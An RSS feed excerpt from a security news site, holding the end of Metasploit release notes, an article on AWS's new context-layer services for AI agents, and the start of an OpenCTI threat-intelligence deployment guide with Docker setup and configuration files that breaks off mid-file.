and enables graceful shutdowns by transitioning from Rack's handler to direct Puma server API management.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21564">#21564</a> from <a href="https://github.com/adfoster-r7">adfoster-r7</a> - Fixes a crash in the <span data-type="inlineCode">smb_version</span> module when run against SMBv1 targets.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21570">#21570</a> from <a href="https://github.com/sjanusz-r7">sjanusz-r7</a> - Fixes an issue where it was not possible to generate ARM Big Endian payloads.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21571">#21571</a> from <a href="https://github.com/dwelch-r7">dwelch-r7</a> - Deleted files are now excluded when running <span data-type="inlineCode">msfconsole</span> <span data-type="inlineCode">reload</span> commands.</li></ul><h2>Documentation</h2><p>You can find the latest Metasploit documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222026-06-11T10%3A00%3A50Z..2026-06-18T10%3A42%3A18%2B01%3A00%22">Pull Requests 6.4.137...6.4.139</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.137...6.4.139">Full diff 6.4.137...6.4.139</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AWS enters the context layer race with a graph that learns from agents, not manual curation]]></title>
<description><![CDATA[Building a context layer between enterprise data stores and AI agents is bespoke work, with no standard service to automate or maintain the graphs over time. Amazon is making a direct play to change that.Amazon on Wednesday entered the space, announcing a series of three products it's positioning...]]></description>
<link>https://tsecurity.de/de/3606395/it-nachrichten/aws-enters-the-context-layer-race-with-a-graph-that-learns-from-agents-not-manual-curation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3606395/it-nachrichten/aws-enters-the-context-layer-race-with-a-graph-that-learns-from-agents-not-manual-curation/</guid>
<pubDate>Thu, 18 Jun 2026 02:17:28 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Building a context layer between enterprise data stores and AI agents is bespoke work, with no standard service to automate or maintain the graphs over time. Amazon is making a direct play to change that.</p><p>Amazon on Wednesday entered the space, announcing a series of three products it's positioning as a context intelligence stack for AI agents. The centerpiece is AWS Context, a new knowledge graph service that gets smarter through agent usage over time. AWS also announced the general availability of Amazon S3 Annotations and a preview of skill assets in AWS Glue Data Catalog.</p><p>The context layer is now a contested architectural category with no shortage of options from different vendors. AWS is entering that market with a different architectural premise: that the graph should learn from how agents use it automatically, without human re-curation.</p><p>"Your agents now get smarter without you having to rebuild anything from scratch," said Swami Sivasubramanian, vice president of Agentic AI at AWS, during his AWS Summit NYC keynote. </p><p>"This service automatically builds a knowledge graph from all your existing data," he said. "This service infers relationships across your data sets, business rules, and domain knowledge, and makes all of it available to your agents and your organization at runtime."  </p><h2>AWS Context builds a self-learning knowledge graph from existing data</h2><p>It's a problem AWS says it has seen repeatedly in customer deployments. </p><p>AWS Context maps relationships across existing data automatically: what tables exist, what columns mean, how sources relate and which sources are authoritative. It combines semantic search with graph-level reasoning and infers relationships across datasets, business rules and domain knowledge, making all of it available to agents at runtime.</p><p>"The knowledge graph improves itself over time as it learns which sources produce correct results and which parts get used," Sivasubramanian said. </p><p>Data stewards manage the graph through the AWS Management Console, reviewing inferred relationships, promoting them to production and attaching business definitions and usage rules. Every query inherits the calling user's IAM and Lake Formation permissions, making agent data access auditable by identity through controls enterprises already rely on.</p><p>All metadata is published in Apache Iceberg format to Amazon S3 Tables, queryable via Athena, Redshift, Spark or any Iceberg-compatible engine, with no proprietary APIs. Third-party catalog connections are supported, so context from systems outside AWS can be pulled into the same graph. Agents query through agentic search APIs and MCP tools across Bedrock AgentCore, EKS or any MCP-compatible framework.</p><h2>Context is more than just a single service</h2><p>Context is a complicated space and AWS is layering multiple services to help enterprises build context across the data stack.</p><p><b>Amazon S3 Annotations.</b> This service enables users to attach rich business context at the storage layer, directly to individual S3 objects. </p><p><b>AWS Glue Data Catalog skill assets</b>. Glue skill assets attach domain knowledge at the catalog layer, linking runbooks, query patterns and usage rules to data assets across the estate. </p><p>AWS Context then synthesizes both into the knowledge graph that agents query at runtime, combining semantic search with graph-level reasoning across structured and unstructured sources. Each layer feeds the next.</p><h2>AWS is entering a highly competitive context space</h2><p><a href="https://venturebeat.com/data/ai-agents-keep-giving-confident-wrong-answers-the-context-layer-is-enterprise-ais-next-production-problem">Snowflake announced</a> its context approach earlier this month with its Horizon Context and Cortex Sense services. Microsoft is providing context via its<a href="https://venturebeat.com/data/enterprise-ai-agents-keep-operating-from-different-versions-of-reality?_gl=1*b66y4g*_up*MQ..*_ga*MTM4OTgwNTA2LjE3ODE3MzAyNTk.*_ga_SCH1J7LNKY*czE3ODE3MzAyNTgkbzEkZzAkdDE3ODE3MzAyNTgkajYwJGwwJGgw*_ga_B8TDS1LEXQ*czE3ODE3MzAyNTgkbzEkZzEkdDE3ODE3MzAyNTgkajYwJGwwJGgw"> Fabric IQ platform</a> that provides a semantic ontology for data. Redis has developed a<a href="https://venturebeat.com/data/context-architecture-is-replacing-rag-as-agentic-ai-pushes-enterprise-retrieval-to-its-limits?_gl=1*i19buu*_up*MQ..*_ga*MTM4OTgwNTA2LjE3ODE3MzAyNTk.*_ga_SCH1J7LNKY*czE3ODE3MzAyNTgkbzEkZzAkdDE3ODE3MzAyNTgkajYwJGwwJGgw*_ga_B8TDS1LEXQ*czE3ODE3MzAyNTgkbzEkZzEkdDE3ODE3MzAyNTgkajYwJGwwJGgw"> context platform</a> that optimizes data for retrieval. Vector database vendor Pinecone has its<a href="https://venturebeat.com/data/the-rag-era-is-ending-for-agentic-ai-a-new-compilation-stage-knowledge-layer-is-what-comes-next?_gl=1*klgyi3*_up*MQ..*_ga*MTM4OTgwNTA2LjE3ODE3MzAyNTk.*_ga_SCH1J7LNKY*czE3ODE3MzAyNTgkbzEkZzAkdDE3ODE3MzAyNTgkajYwJGwwJGgw*_ga_B8TDS1LEXQ*czE3ODE3MzAyNTgkbzEkZzEkdDE3ODE3MzAyNTgkajYwJGwwJGgw"> Nexus context offering</a> that compiles enterprise data into task-specific artifacts before agents ever query them.</p><p>AWS's structural argument is straightforward: for enterprises already running S3, Glue and Lake Formation, AWS Context extends an existing identity model with no data movement required. The pitch is zero-integration friction — not just cost consolidation.</p><p>"Context makes agents more powerful and as the whole world is building agents, every agentic platform vendor needs a context capability," Holger Mueller, VP and Principal analyst at Constellation Research, told VentureBeat.</p><p>Mueller noted that AWS is no exception. "The concern — as with all context offerings — is going to be performance, especially for transactional data,  we will see," he said.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Ausführen beliebiger Kommandos in redis (Red Hat)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3601302/it-security-nachrichten/ausfuehren-beliebiger-kommandos-in-redis-red-hat/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3601302/it-security-nachrichten/ausfuehren-beliebiger-kommandos-in-redis-red-hat/</guid>
<pubDate>Tue, 16 Jun 2026 11:43:43 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
<title><![CDATA[The Intelligent Shield. OpenCTI]]></title>
<description><![CDATA[Beyond Ingestion Subtitle: Deploying AI-Driven Enrichment in OpenCTITransforming Threat Data into High-Confidence IntelligenceIn an era of relentless and complex cyber attacks, traditional, manual threat intelligence cannot keep pace. Security teams are overwhelmed by data fragmentation and the c...]]></description>
<link>https://tsecurity.de/de/3600900/hacking/the-intelligent-shield-opencti/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3600900/hacking/the-intelligent-shield-opencti/</guid>
<pubDate>Tue, 16 Jun 2026 09:09:15 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h4>Beyond Ingestion <strong>Subtitle:</strong> Deploying AI-Driven Enrichment in OpenCTI</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*yZJrYF0KW4x5gzDg6xNN6A.png"></figure><h3>Transforming Threat Data into High-Confidence Intelligence</h3><p>In an era of relentless and complex cyber attacks, traditional, manual threat intelligence cannot keep pace. Security teams are overwhelmed by data fragmentation and the critical lack of context. “The Intelligent Shield” introduces a new paradigm: beyond simply ingesting data, it’s about deploying advanced, automated machine learning pipelines for <strong>AI-driven enrichment.</strong></p><p>This guide demonstrates how to integrate state-of-the-art Large Language Models (LLMs), such as <strong>Claude AI</strong>, into an <strong>OpenCTI</strong> ecosystem. By leveraging the <strong>OpenCTI STIX 2.1 Knowledge Graph</strong> and natural language processing, this architecture converts disparate, unstructured data feeds into high-fidelity, actionable intelligence. It automatically builds context, executes deep mapping to frameworks like the <strong>MITRE ATT&amp;CK Matrix</strong>, and generates calculated, real-time <strong>Confidence Scores</strong>, enabling organizations to proactively strengthen their defenses with an intuitive, automated <strong>Intelligent Shield.</strong></p><h3>Table of Contents</h3><ol><li><a href="https://infosecwriteups.com/the-intelligent-shield-057c9b4b9394#6e45"><strong>What is OpenCTI?</strong></a></li><li><a href="https://infosecwriteups.com/the-intelligent-shield-057c9b4b9394#8ff6"><strong>Core Capabilities</strong></a></li><li><a href="https://infosecwriteups.com/the-intelligent-shield-057c9b4b9394#7dc1"><strong>Architecture Overview</strong></a></li><li><a href="https://infosecwriteups.com/the-intelligent-shield-057c9b4b9394#7865"><strong>Threat Intelligence Feeds</strong></a></li><li><a href="https://infosecwriteups.com/the-intelligent-shield-057c9b4b9394#fe8e"><strong>AI Integration Layer</strong></a></li><li><a href="https://infosecwriteups.com/the-intelligent-shield-057c9b4b9394#c6df"><strong>Prerequisites</strong></a></li><li><a href="https://infosecwriteups.com/the-intelligent-shield-057c9b4b9394#7c94"><strong>Docker Compose Deployment</strong></a></li><li><a href="https://infosecwriteups.com/the-intelligent-shield-057c9b4b9394#b276"><strong>Connector Configuration</strong></a></li><li><a href="https://infosecwriteups.com/the-intelligent-shield-057c9b4b9394#a2bd"><strong>AI-Driven Enrichment Pipeline</strong></a></li><li><a href="https://infosecwriteups.com/the-intelligent-shield-057c9b4b9394#99be"><strong>Post-Deployment Hardening</strong></a></li><li><a href="https://infosecwriteups.com/the-intelligent-shield-057c9b4b9394#fd26"><strong>Operational Runbook</strong></a></li><li><a href="https://infosecwriteups.com/the-intelligent-shield-057c9b4b9394#aabb"><strong>Troubleshooting</strong></a></li><li><a href="https://infosecwriteups.com/the-intelligent-shield-057c9b4b9394#7e3e"><strong>Usage Examples</strong></a></li></ol><h3>1. What is OpenCTI?</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*fSYjMAN2q5yyUccU6F6daQ.png"></figure><p><strong>OpenCTI</strong> (Open Cyber Threat Intelligence) is an open-source platform developed by Filigran (formerly a project of ANSSI, the French national cybersecurity agency) for structuring, storing, organizing, visualizing, and sharing cyber threat intelligence (CTI).</p><p>It implements the <strong>STIX 2.1</strong> (Structured Threat Information eXpression) standard as its native data model and exposes a <strong>GraphQL API</strong> for all read/write operations. Every object — threat actors, campaigns, malware, vulnerabilities, indicators, attack patterns — is stored as a STIX Domain Object (SDO) or STIX Relationship Object (SRO) backed by two databases:</p><ul><li><strong>ElasticSearch / OpenSearch</strong> — full-text search and analytics</li><li><strong>Apache Cassandra (via JanusGraph)</strong> — graph relationship storage</li></ul><h3>Why OpenCTI?</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*1a3jOT66dfRuy3XvkQJ5NQ.png"></figure><h3>2. Core Capabilities</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*uj2dA3oWyo03XyrbjkNrGg.png"></figure><h4>2.1 Knowledge Graph</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*YvoudJ_c2ItEwEgTZ8TGaQ.png"></figure><ul><li>Entities: Threat Actors, Intrusion Sets, Campaigns, Malware, Tools, Vulnerabilities (CVE), Attack Patterns (MITRE ATT&amp;CK), Courses of Action, Sectors, Countries, Organizations</li><li>Relationships modelled as first-class STIX SROs with confidence scores, date ranges, and TLP markings</li><li>Diamond Model and Kill Chain views built in</li></ul><h4>2.2 Indicator Management</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*pGfNRDKffBczwNJeMydW8w.png"></figure><ul><li>IOC lifecycle: valid_from / valid_until with automatic expiry</li><li>Detection rule generation (Sigma, YARA, Snort)</li><li>Bulk import via STIX, CSV, OpenIOC, MISP formats</li><li>Scoring and confidence weighting per source</li></ul><h4>2.3 MITRE ATT&amp;CK Navigator Integration</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*_jOEvP3job4uFFPBnXLIkA.png"></figure><ul><li>Full ATT&amp;CK Enterprise / Mobile / ICS matrices</li><li>Heatmaps of technique usage per threat actor or campaign</li><li>Gap analysis against your current detection coverage</li></ul><h4>2.4 Threat Actor Profiling</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*N98FeMPaxF2ZYnhLF8kEGQ.png"></figure><ul><li>Attributed aliases, motivations (financial, espionage, hacktivism)</li><li>Geo and sector targeting mapped on world map</li><li>Timeline of campaigns and malware usage</li></ul><h4>2.5 Automation &amp; Playbooks</h4><ul><li>Built-in playbook engine (since v5.9): trigger enrichment, notifications, or SOAR actions on entity creation/modification(<strong>Enterprise Edition only)</strong></li><li>Python SDK for custom automation</li><li>Webhook support for external integrations</li></ul><h4>2.6 Collaboration &amp; Sharing</h4><ul><li>Role-based access control (RBAC) with groups and organizations</li><li>TLP (Traffic Light Protocol) enforcement at object level</li><li>TAXII 2.1 server — push feeds to SIEMs, firewalls, EDR platforms</li><li>Sharing with partner organizations via federated instances</li></ul><h4>2.7 Dashboard &amp; Reporting</h4><ul><li>Customizable dashboards with widget library</li><li>PDF report generation</li><li>Timeline, matrix, and entity views</li><li>Attack path visualization</li></ul><h3>3. Architecture Overview</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*xAFxmmcNnaHdD8ZDbXIbDw.png"></figure><h3>4. Threat Intelligence Feeds</h3><h4>4.1 Free / Open-Source Feeds</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*zamxLo7VEhjGX0cOnZvRJQ.png"></figure><ul><li><a href="https://attack.mitre.org/?utm_source=chatgpt.com"><strong>MITRE ATT&amp;CK</strong></a> — Connector: opencti/connector-mitre — Data: Techniques, mitigations, groups, software — Setup: API key not needed.</li><li><a href="https://nvd.nist.gov/?utm_source=chatgpt.com"><strong>CVE / NVD</strong></a> — Connector: opencti/connector-cve — Data: Vulnerabilities — Setup: <a href="https://nvd.nist.gov/developers/request-an-api-key">NVD API key</a> recommended/required depending on configuration.</li><li><a href="https://otx.alienvault.com/?utm_source=chatgpt.com"><strong>AlienVault OTX</strong></a> — Connector: opencti/connector-alienvault — Data: IOCs, pulses, malware families — Setup: Free OTX account/API key.</li><li><a href="https://bazaar.abuse.ch/?utm_source=chatgpt.com"><strong>Abuse.ch MalwareBazaar</strong></a> — Connector: opencti/connector-malwarebazaar — Data: Malware hashes, malware metadata, file observables — Setup: Free MalwareBazaar API key.</li><li><a href="https://urlhaus.abuse.ch/?utm_source=chatgpt.com"><strong>Abuse.ch URLhaus</strong></a> — Connector: opencti/connector-urlhaus — Data: Malicious URLs — Setup: Public feed; no API key for CSV feed.</li><li><a href="https://feodotracker.abuse.ch/?utm_source=chatgpt.com"><strong>Abuse.ch Feodo Tracker</strong></a> — Connector: use <a href="https://github.com/OpenCTI-Platform/connectors/tree/master/external-import/misp-feed?utm_source=chatgpt.com">opencti/connector-misp-feed</a> or ingest the Feodo CSV/blocklist feed manually — Data: Botnet C2 IPs — Setup: Free.</li><li><a href="https://internetdb.shodan.io/"><strong>Shodan InternetDB</strong></a> — Connector: opencti/connector-shodan-internetdb — Data: IP enrichment, domains, CPEs, CVEs, tags — Setup: No API key required.</li><li><a href="https://www.misp-project.org/feeds/?utm_source=chatgpt.com"><strong>MISP Default / CIRCL OSINT Feeds</strong></a> — Connector: <a href="https://github.com/OpenCTI-Platform/connectors/tree/master/external-import/misp-feed?utm_source=chatgpt.com">opencti/connector-misp-feed</a> — Data: STIX/MISP bundles, indicators, observables — Setup: Free.</li><li><a href="https://www.misp-project.org/feeds/?utm_source=chatgpt.com"><strong>CyberCrime-Tracker feed via MISP default feeds</strong></a> — Connector: use <a href="https://github.com/OpenCTI-Platform/connectors/tree/master/external-import/misp-feed?utm_source=chatgpt.com">opencti/connector-misp-feed</a> rather than a dedicated current connector — Data: C2 panels / freetext indicators — Setup: Free.</li><li><a href="https://openphish.com/?utm_source=chatgpt.com"><strong>OpenPhish</strong></a> — Connector: no verified current dedicated OpenCTI connector in the main repo; use generic feed ingestion where suitable — Data: Phishing URLs — Setup: Free/community feed options.</li><li><strong>DigitalSide IT-ISAC MISP Feed</strong> — Connector: <a href="https://github.com/OpenCTI-Platform/connectors/tree/master/external-import/misp-feed?utm_source=chatgpt.com">opencti/connector-misp-feed</a> with custom MISP_FEED_URL — Data: IOCs / MISP-format feed — Setup: Free.</li></ul><h4>4.2 Commercial Feeds (require license/API key)</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*dMgCc4cuy0X9LxEAcR0PiQ.png"></figure><ul><li><a href="https://www.misp-project.org/"><strong>MISP — self-hosted</strong></a> — Connector: opencti/connector-misp — Strengths: community sharing, custom events, internal/private CTI exchange. The OpenCTI repo lists both misp and misp-feed; use misp for a live MISP instance with API access, and misp-feed for static MISP feed URLs.</li><li><a href="https://www.virustotal.com/"><strong>VirusTotal / Google Threat Intelligence</strong></a> — Connector: opencti/connector-virustotal — Strengths: file, URL, domain, and IP enrichment. The connector is under internal-enrichment, not external-import.</li><li><strong>Mandiant Threat Intelligence / Google Threat Intelligence</strong> — Connector: opencti/connector-mandiant — Strengths: APT intelligence, actor reporting, malware/campaign context.</li><li><a href="https://www.recordedfuture.com/"><strong>Recorded Future</strong></a> — Connectors: opencti/connector-recordedfuture and opencti/connector-recordedfuture-enrichment — Strengths: risk lists, enrichment, vulnerability/contextual intelligence, dark web and external threat data. Recorded Future documentation describes the OpenCTI integration as two components: an enrichment connector and a Recorded Future connector.</li><li><a href="https://www.crowdstrike.com/products/threat-intelligence/"><strong>CrowdStrike Falcon Intelligence</strong></a> — Connector: opencti/connector-crowdstrike — Strengths: actor tracking, indicators, adversary intelligence, Falcon ecosystem context.</li><li><a href="https://www.sekoia.io/"><strong>Sekoia.io Intelligence</strong></a> — Connector: opencti/connector-sekoia — Strengths: European threat landscape, CTI feed ingestion, actor/campaign context. Sekoia’s own documentation points to the OpenCTI GitHub connector path.</li><li><a href="https://threatconnect.com/"><strong>ThreatConnect</strong></a> — Connector: <strong>no verified current dedicated connector in the main OpenCTI connector tree</strong> — Strengths: enterprise TI management, source aggregation, workflow and case management. I found an OpenCTI GitHub label/feature reference for “threat connect,” but not a confirmed current connector folder equivalent to external-import/threatconnect.</li><li><a href="https://intel471.com/"><strong>Intel 471</strong></a> — Connectors: opencti/connector-intel471, opencti/connector-intel471-darknet, and opencti/connector-intel471_v2 — Strengths: underground forums, cybercrime actors, malware, infrastructure, dark web intelligence.</li></ul><h4>4.3 ISAC / Government Feeds</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*dtrgjORW-h5AoEi0rOMBHw.png"></figure><ul><li><a href="https://www.cisa.gov/resources-tools/services/automated-indicator-sharing-ais-service?utm_source=chatgpt.com"><strong>CISA Automated Indicator Sharing / AIS</strong></a> — Method: TAXII/STIX client, AIS 2.0 uses TAXII 2.1 — Access: free service for eligible participants; contact CISA to onboard.</li><li><a href="https://www.fsisac.com/?utm_source=chatgpt.com"><strong>FS-ISAC</strong></a> — Method: STIX/TAXII and MISP automated feeds — Access: financial-sector membership; automated-feed credentials/licensing must be explicitly requested.</li><li><a href="https://health-isac.org/"><strong>Health-ISAC / H-ISAC</strong></a> — Method: HITS indicator-sharing feed; STIX/TAXII-compatible threat intelligence sharing — Access: healthcare-sector membership / Health-ISAC member access.</li><li><a href="https://www.misp-project.org/communities/?utm_source=chatgpt.com"><strong>NATO MISP Community</strong></a> — Method: MISP community / MISP sync — Access: official government cyber-defense entities from NATO nations, sponsored by their national representative in the NATO Multinational MISP Steering Board.</li><li><a href="https://www.enisa.europa.eu/topics/cyber-threats/threat-landscape?utm_source=chatgpt.com"><strong>ENISA Threat Landscape</strong></a> — Method: public reports and CTI publications; not a confirmed public TAXII/STIX feed. ENISA’s CTL methodology references STIX 2.1 as a common CTI representation format, but this is different from offering a public feed endpoint.</li></ul><h4>4.4 Feed Priority and TLP Assignment</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*XhNw0PBdOVuwb9zHT37S5Q.png"></figure><pre># Recommended TLP assignment by source<br>feeds:<br>  - source: mitre_attack<br>    tlp: WHITE          # public, shareable<br>    confidence: 90<br>  - source: alienvault_otx<br>    tlp: GREEN          # community sharing<br>    confidence: 60<br>  - source: mandiant<br>    tlp: AMBER          # restricted to org<br>    confidence: 85<br>  - source: internal_soc<br>    tlp: RED            # internal only<br>    confidence: 95</pre><h3>5. AI Integration Layer</h3><p>This is the “AI-driven” layer on top of standard OpenCTI — a custom connector and MCP server that adds:</p><h4>5.1 AI Enrichment Connector (Claude API)</h4><ul><li>On every new Report, Malware, or Threat-Actor ingested → call Claude API</li><li>Extract structured STIX entities from unstructured text (PDFs, blog posts)</li><li>Summarize long reports into 3-sentence executive briefs</li><li>Score indicator relevance against your organization’s sector profile</li><li>Suggest ATT&amp;CK technique mappings from narrative descriptions</li></ul><h4>5.2 AI Pipeline Architecture</h4><pre>New Report ingested<br>        │<br>        ▼<br>[AI Enrichment Connector]<br>        │<br>        ├─► Claude API: Extract entities → creates STIX SDOs<br>        ├─► Claude API: Map to ATT&amp;CK techniques<br>        ├─► Claude API: Generate executive summary<br>        └─► Claude API: Score severity for your sector<br>                │<br>                ▼<br>        Update Report in OpenCTI<br>        (summary, related entities, confidence scores)</pre><h3>6. Prerequisites</h3><h4>6.1 Hardware (minimum production)</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Ics48TK_7nXqH-diy8Uzng.png"></figure><h4>6.2 Software</h4><pre># Install Docker Engine (Ubuntu 22.04)<br>sudo apt-get update<br>sudo apt-get install -y ca-certificates curl gnupg lsb-release<br>sudo install -m 0755 -d /etc/apt/keyrings<br>curl -fsSL https://download.docker.com/linux/ubuntu/gpg | \<br>  sudo gpg --dearmor -o /etc/apt/keyrings/docker.gpg<br>sudo chmod a+r /etc/apt/keyrings/docker.gpg<br>echo "deb [arch=$(dpkg --print-architecture) signed-by=/etc/apt/keyrings/docker.gpg] \<br>  https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable" | \<br>  sudo tee /etc/apt/sources.list.d/docker.list &gt; /dev/null<br>sudo apt-get update<br>sudo apt-get install -y docker-ce docker-ce-cli containerd.io docker-compose-plugin<br># Add user to docker group<br>sudo usermod -aG docker $USER<br>newgrp docker<br># Verify<br>docker compose version</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/698/1*eM3O8rdQsyvwxf-0WEZX8w.png"></figure><h4>6.3 System Tuning (required for ElasticSearch)</h4><pre># ElasticSearch requires high vm.max_map_count<br>sudo sysctl -w vm.max_map_count=1048575<br>echo "vm.max_map_count=1048575" | sudo tee -a /etc/sysctl.conf<br><br># Increase file descriptor limits<br>echo "* soft nofile 65536" | sudo tee -a /etc/security/limits.conf<br>echo "* hard nofile 65536" | sudo tee -a /etc/security/limits.conf</pre><h3>7. Docker Compose Deployment</h3><h4><strong>7.0 Deploy from GitHub (recommended)</strong></h4><p>The fastest deployment path is to clone the maintained project repository and create a local `.env` from the sanitized template:</p><pre>cd /home/andrey<br>git clone https://github.com/anpa1200/opencti-intelligent-shield.git openCTI<br>cd /home/andrey/openCTI<br># Create local secrets/config. This file is ignored by Git.<br>cp .env.example .env<br>nano .env<br># Start the full stack after filling in .env<br>./scripts/start-all.sh</pre><p>This gives you the Docker Compose files, OpenCTI patches, AI enrichment connector, helper scripts, and Docusaurus documentation in one checkout. Use the manual sections below if you want to recreate the files by hand or compare the generated content.</p><h4>7.1 Directory Structure</h4><pre>/home/andrey/openCTI/<br>├── .env                          # secrets and config<br>├── docker-compose.yml            # core stack<br>├── docker-compose.connectors.yml # feed connectors<br>├── docker-compose.ai.yml         # AI enrichment connector<br>├── patches/<br>│   └── back.js                   # ILM race condition fix (ES 8.13 + OpenCTI 6.2.0)<br>└── connectors/<br>    └── ai-enrichment/            # custom AI connector source</pre><h4>7.2 Environment File</h4><pre>cat &gt; /home/andrey/openCTI/.env &lt;&lt; 'EOF'<br># === Core ===<br>OPENCTI_ADMIN_EMAIL=admin@opencti.local<br>OPENCTI_ADMIN_PASSWORD=CHANGE_ME_STRONG_PASSWORD<br>OPENCTI_ADMIN_TOKEN=CHANGE_ME_UUID4_TOKEN<br>OPENCTI_BASE_URL=http://localhost:8080<br><br># === Secrets ===<br>APP__ADMIN__TOKEN=CHANGE_ME_UUID4_TOKEN<br>APP__SECRET_KEY=CHANGE_ME_SECRET<br><br># === ElasticSearch ===<br># NOTE: key is ELASTIC_PASSWORD, not ELASTIC_AUTH<br>ELASTIC_PASSWORD=CHANGE_ME_ELASTIC_PASS<br><br># === Redis ===<br>REDIS_PASSWORD=opencti<br><br># === MinIO ===<br>MINIO_ROOT_USER=opencti<br>MINIO_ROOT_PASSWORD=CHANGE_ME_MINIO_PASS<br><br># === RabbitMQ ===<br>RABBITMQ_DEFAULT_USER=opencti<br>RABBITMQ_DEFAULT_PASS=CHANGE_ME_RABBITMQ_PASS<br><br># === Connector IDs (unique UUID4 per connector — NOT used for auth) ===<br>CONNECTOR_MITRE_TOKEN=CHANGE_ME_UUID4<br>CONNECTOR_CVE_TOKEN=CHANGE_ME_UUID4<br>CONNECTOR_ALIENVAULT_TOKEN=CHANGE_ME_UUID4<br>CONNECTOR_ABUSE_SSL_TOKEN=CHANGE_ME_UUID4<br>CONNECTOR_URLHAUS_TOKEN=CHANGE_ME_UUID4<br>CONNECTOR_AI_ENRICHMENT_TOKEN=CHANGE_ME_UUID4<br><br># === External API keys ===<br>ALIENVAULT_API_KEY=your_otx_key_here<br>NVD_API_KEY=your_nvd_api_key_here     # UUID format from nvd.nist.gov/developers/request-an-api-key<br>ANTHROPIC_API_KEY=your_claude_api_key_here<br>EOF<br><br># Generate unique UUIDs for connector IDs<br>python3 -c "import uuid; [print(uuid.uuid4()) for _ in range(8)]"# Generate proper tokens<br>python3 -c "import uuid; [print(f'Token: {uuid.uuid4()}') for _ in range(10)]"</pre><h4>7.3 Core Stack — docker-compose.yml</h4><pre>nano docker-compose.yml</pre><pre>version: "3"<br>services:<br>  redis:<br>    image: redis:7.2<br>    restart: always<br>    volumes:<br>      - redisdata:/data<br>    command: redis-server --requirepass ${REDIS_PASSWORD:-opencti}<br>  elasticsearch:<br>    image: docker.elastic.co/elasticsearch/elasticsearch:8.13.0<br>    volumes:<br>      - esdata:/usr/share/elasticsearch/data<br>    environment:<br>      - discovery.type=single-node<br>      - xpack.ml.enabled=false<br>      - xpack.security.enabled=true<br>      - ELASTIC_PASSWORD=${ELASTIC_PASSWORD:-CHANGE_ME}<br>      - "ES_JAVA_OPTS=-Xms2g -Xmx2g"<br>      - cluster.routing.allocation.disk.threshold_enabled=false<br>    ulimits:<br>      memlock:<br>        soft: -1<br>        hard: -1<br>    restart: always<br>  minio:<br>    image: minio/minio:RELEASE.2024-01-16T16-07-38Z<br>    volumes:<br>      - miniodata:/data<br>    ports:<br>      - "9001:9001"   # console<br>    environment:<br>      MINIO_ROOT_USER: ${MINIO_ROOT_USER:-opencti}<br>      MINIO_ROOT_PASSWORD: ${MINIO_ROOT_PASSWORD:-CHANGE_ME}<br>    command: server /data --console-address ":9001"<br>    restart: always<br>  rabbitmq:<br>    image: rabbitmq:3.13-management<br>    environment:<br>      RABBITMQ_DEFAULT_USER: ${RABBITMQ_DEFAULT_USER:-opencti}<br>      RABBITMQ_DEFAULT_PASS: ${RABBITMQ_DEFAULT_PASS:-CHANGE_ME}<br>      RABBITMQ_NODENAME: rabbit01@localhost<br>    volumes:<br>      - rabbitmqdata:/var/lib/rabbitmq<br>    restart: always<br>  opencti:<br>    image: opencti/platform:6.2.0<br>    environment:<br>      NODE_OPTIONS: --max-old-space-size=8096<br>      APP__PORT: 8080<br>      APP__BASE_URL: ${OPENCTI_BASE_URL:-http://localhost:8080}<br>      APP__ADMIN__EMAIL: ${OPENCTI_ADMIN_EMAIL}<br>      APP__ADMIN__PASSWORD: ${OPENCTI_ADMIN_PASSWORD}<br>      APP__ADMIN__TOKEN: ${OPENCTI_ADMIN_TOKEN}<br>      APP__APP_LOGS__LOGS_LEVEL: error<br>      REDIS__HOSTNAME: redis<br>      REDIS__PORT: 6379<br>      REDIS__USE_SSL: "false"<br>      REDIS__PASSWORD: ${REDIS_PASSWORD:-opencti}<br>      ELASTICSEARCH__URL: http://elasticsearch:9200<br>      ELASTICSEARCH__USERNAME: elastic<br>      ELASTICSEARCH__PASSWORD: ${ELASTIC_PASSWORD:-CHANGE_ME}<br>      MINIO__ENDPOINT: minio<br>      MINIO__PORT: 9000<br>      MINIO__USE_SSL: "false"<br>      